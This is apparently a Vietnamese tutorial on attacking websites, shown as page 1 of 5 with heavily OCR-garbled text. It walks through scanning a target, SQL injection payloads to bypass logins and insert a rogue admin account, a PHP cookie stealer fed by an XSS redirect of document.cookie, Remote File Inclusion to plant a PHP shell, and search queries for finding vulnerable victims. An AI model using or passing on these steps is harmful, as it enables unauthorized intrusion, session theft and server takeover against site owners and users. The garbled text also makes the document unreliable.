You are on page 1of 5

k thut attack mt webste .

B vt ny t s cha m cc phn nh sau :

1> Tm heu do tong attack .
2> a. SOL In|ecton - Logn Bypass
b.SOL In|ecton - Lay thng tn cc tabe
3> a. XSS - Cooke Steaer ( dnh cap cooke )
b. |avaScrpt In|ecton
4> Remote Fe Incuson
5> a. Nu Byte - Pcture Upoad
b.Nu Byte - CGI Expotaton
6> Tong kt.
1> Tm heu do tong attack :
y mt bc kho du rat quan trong v ko the thu kh muon tan cng 1 trang
web no d . Chng ta cn su dung cc too chuyn dung de scan cc thng tn cua
trang web v du nh tm cc port mo , xem thng tn ve host .
Trc tn , tm xem cc port dang mo cua host web , ban c the su dung cc chong
trnh nh Super Scanner cua Foundstone ( dy chong trnh d su dung ) , hoac
chong trnh scan NMAP m da so deu cho rng scan tot hon .
V 1 port mo no d m ban tm thay , xem chng thuc dang no , chng ta c the
tm heu ve cau hnh drectory trn host web .
Tm heu thm cc thng tn khc , v du regstrar cua doman , su dung cc trang
web whos nh :
ban s c doc nhng thng tn g tr} ve trang web do tong .
2> a. SOL In|ecton - Logn Bypass :
Co bn v don gn nhat cua SOL In|ecton ogn by pass , v 1 trang web b}
SOL In|ecton chng ta c the su dung k tu sau :
OR 1=1--
den vo phn username v password cua trang ogn , v chng ta c the " qua mat
" doc SOL query de c doc nhng " dac quyen" trn trang web b} .
Hoac ban cng c the den vo nk URL cua trang web , v du nh go trang web
SOL In|ecton :
Chng ta s n|ect SOL nh sau :
CODE OR 1=1--
V chng ta cng s thu doc kt qu tong tu bc o trn. y 1 v n|ecton c
the su dung :
' or 0=0 --
" or 0=0 --
or 0=0 --
h or 1=1--
y bc don gn nhat cua k thut SOL In|ecton , tuy nhn d c s ko c kt
r rng trn 1 trang web no d .
CODE - Thng tn chung ve SOL Securty/In|ecton - Hoc v tm heu ngn ng SOL
2> b. SOL In|ecton - Lay thng tn cc tabe :
y 1 k thut cao cap hon ve kha thc SOL In|ecton . Gom 3 bc _ trc tn
chng ta s tao ra trn trang web b} SOL In|ecton de tm doc nhng tabe names
( nhm muc dch tao mt account dac quyen ) . Tp tuc chng ta a tao thm mt
error khc de c doc tabe name quan trong . V cuo cng n|ect SOL de tao
admn's account .
e c doc kt qu cuo cng , trc ht trn trang web b} chng ta s ogn v
username nh sau :
Ko den password v nhan enter , chng ta s nhn doc mt thng bo ( error )
v 1 tabe name , tong tu nh sau :
Coumn user_member.user_d s nvad and was not found ....
( u phn ch tm v du ve tabe name ) , thng bo error c the d hon nhng
c quan trong chng ta cn tabe name , nh v du trn dy user_member.d
cha thng tn ve username , chng ta s thuc hn bc tp theo nhm tm thm
cc tabe name quan trong khc :
Error nhn doc c the nh sau :
Coumn user_member.user_d s nvad and was not found . Coumn
user_member.passwd s nvad and was not found
v tabe m o dy nhn doc user_member.passwd tabe cha password , vy
chng ta c the thng qua cc tabe tm doc chng ta s tao mt account v cc
dac quyen admn :
CREATION_DATE) VALUES(VetLuv,hacked,hacked,GETDATE();--
V by g chng ta c the ogn v quyen admn bng username VetLuv v
password hacked .
Trn dy ch cn bn nhat ve kha thc SOL In|ecton , cc hacker thng qua SOL
In|ecton de tm cc tabe cha cc thng tn quan trong nh credt card ...v...v... Cn
tm heu thm v kn nhn hon de dat doc kt qu mong muon . Cc thac mac ban
c the post b h ta dy .
3> a. XSS - Cooke Steaer ( dnh cap cooke ) :
phn ny chng ta s n ve XSS ( hay CSS ) >> Cross Ste Scrptng , cch dat
code de ay cooke trn cc guestbooks hoac cc forum bo mt km u a sau kh
cc user dng nhp . Cookes doc hu ht cc forum su dung nhm xc nhn a
thng tn cua user , v cooke cng ch c 1 cho m user , kh ay doc cooke cua
user no chng ta d bat du c the tro thnh user d .
Trc tn chng ta hy su dung PHP de tao nn scrpt ay cap cooke
Copy v save doan code trn thnh steaer.php
D dy n dung cua doan code :
cooke = _GET'cooke';
v dng qun mt dng rat quan trong :
og = fopen("cookesVNM.txt","a");
ban hy tao 1 trang txt trong tn cookesVNM.txt .
Upoad 2 fe n trn n host cua ban v dng qun chmod fe cookesVNM.txt
666 >> Nh vy cn bn ban d c doc scrpt ay cap cooke .
V trn 1 ste b} XSS In|ecton , ban c the test bng cch post doan code sau
trong cc phn cho php cua ste :
scrpt>aert(Testng For XSS Hoe)/scrpt>
nu nhn doc mt Aert box gh Testng For XSS Hoe th ste ny chac chan dnh .
V chng ta c the dnh cap cooke bng cch dng doan code sau :
wndow.ocaton = '' document.cooke;
doan code ny s redrects member dn trang steaer.php ban d tao v u a
cooke trong fe cookesVNM.txt .
Ban c the tm heu r hon ve XSS trong b vt Hackng Guestbooks cua GrL_Noob .
4> Remote Fe Incuson :
Remote Fe Incuson ( go tat RFI ) mt doc tm thay trn kh nheu trang
web hn nay . Cch kha thc a v cng don gn nn n chung n kh pho bn
trong th dem hn ta .
Cch kha thc Remote Fe Incuson c the doc heu kh trn mt web page ta
dat mt fe cua chng ta ( v du nh fe upoader hay php she ) ,webserver cua
webpage d s heu v hen th} theo php scrpt cua chng ta _ kh d chng ta s d
dng c dy du quyen kem sot server .
N r hon kh mt webste hen th} mt trang khc cua chnh n , chng ta sa a
URL nk v dat trang code php she cua chng ta vo th n s "heu m " trang
cn hn th} v nh vy chng ta s c trang php she ngay trn server cua
webste d .
M ng c the tm thay trang b} bng cch rng cua ho , trong pham v b vt
ny t s n dn cch dng Googe de tm km ste b} . Ta c the tm km nh :
nh vy Googe s cho ra kt qu nhng trang c "ndex.php?page= trn nk ur , v
cch don gn de test ste b} chng ta s thm dng sau
dau = cua nk ste :
Nu nh thay ton b trang googe hn th} trn ste d th chac chan ste ny b}
. e kha thc ny chng ta s dng 1 fe text cha PHP She code up trn host
cua chng ta v cho ste b} hn th} bng cch thay do dng nk URL thm vo
nk dn no cha fe she cua chng ta.
Go ste vctm , php she cua ban she.txt , ste cha nk ban yourste ,
chng ta c nh sau :
Ou don gn ph ko cc ban , php she VetLuv g thu con remvew :
Khng na th dng un con c up sn cua VN Magc ta :
ngha su dung php she cua VN Magc un kh mac cng km , c thm dng
nk trn vo sau dau = cua trang b} ban d c the km sot web server d .
PS : Muon thuc hnh ngay cho r th vo b Thuc hnh attack 1 webste g d cua
Ounh Anh , chc vu .
5> a. Nu Byte - Pcture Upoad :
Cc too scan port chuyn dung :
Super Scaner 4.0
chong trnh ny rat tot kh su dung Wndows
NMap un doc co too scan tot nhat.
Ngo ra cn c cc too scan khc nh Nessus (vunscanner) :